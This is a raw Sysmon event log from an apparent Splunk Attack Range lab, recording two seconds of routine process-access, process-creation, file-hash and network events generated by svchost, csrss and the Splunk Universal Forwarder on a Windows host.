10:35:45.138{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213998Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:35:45.138{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213997Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:35:45.138{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213996Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:35:45.138{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213995Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:35:45.138{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213994Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:35:45.138{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213993Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:35:45.138{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213992Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:35:45.138{4F8D34B0-F11B-6215-0500-000000003902}412532C:\Windows\system32\csrss.exe{4F8D34B0-0E01-6216-EE03-000000003902}520C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000213991Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:35:45.138{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-0E01-6216-EE03-000000003902}520C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000213990Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:35:45.139{4F8D34B0-0E01-6216-EE03-000000003902}520C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x8000000000000000214022Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:35:45.076{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51162-false10.0.1.12-8089- 23542300x8000000000000000214021Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:35:46.591{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=027C65C65C032C9AB587E0A966EFC168,SHA256=DE56783605920CC4619C76CC577E1C3A8F6616AAEE43B22254908369AFCB8953,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000284938Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:35:46.379{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A5BFF719467D4914D373CB3BAA1A634B,SHA256=BA0872F33DE69E05CC68082F873D031B81D0F72A5F9D0C8F85C1D15DA1D26CC4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214020Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:35:46.372{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1135414B3A534DEEA12FA445D04A45B4,SHA256=178188C1BAA717B7F176262413AC664B2CCDE8C3A9DD5AE29E054D8AF77D2839,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214019Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:35:46.372{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=54926D8BD2E1962E9354E09396E8F74E,SHA256=C367E94AA39961B8522A5B852316CFF983552E162C3E2ADE25FDFAA4A7EC88C1,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000214037Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:35:45.498{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51163-false10.0.1.12-8000- 23542300x8000000000000000214036Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:35:47.810{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9D9F923FB5D2BF63605F33E5BC2BA20E,SHA256=69D9E27F0024479297EBB06B39D1F5E5EDC8E4BA6ADF75E9B54159B2DC9917F7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000284939Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:35:47.395{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8C412D2334B5036FF0043EA3C810A007,SHA256=57B7BF9ED9DDB4C3388473AC679B15741E2428EAEF6EE2EE5F825D58029FFEE0,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000214035Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:35:47.435{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-0E03-6216-F003-000000003902}2624C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214034Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:35:47.435{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214033Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:35:47.435{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214032Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:35:47.435{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214031Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:35:47.435{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214030Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:35:47.435{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214029Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:35:47.435{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214028Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:35:47.435{4F8D34B0-F11B-6215-0500-000000003902}412532C:\Windows\system32\csrss.exe{4F8D34B0-0E03-6216-F003-000000003902}2624C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000214027Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:35:47.435{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214026Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:35:47.435{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214025Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:35:47.435{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214024Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:35:47.435{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-0E03-6216-F003-000000003902}2624C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000214023Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:35:47.435{4F8D34B0-0E03-6216-F003-000000003902}2624C:\Program 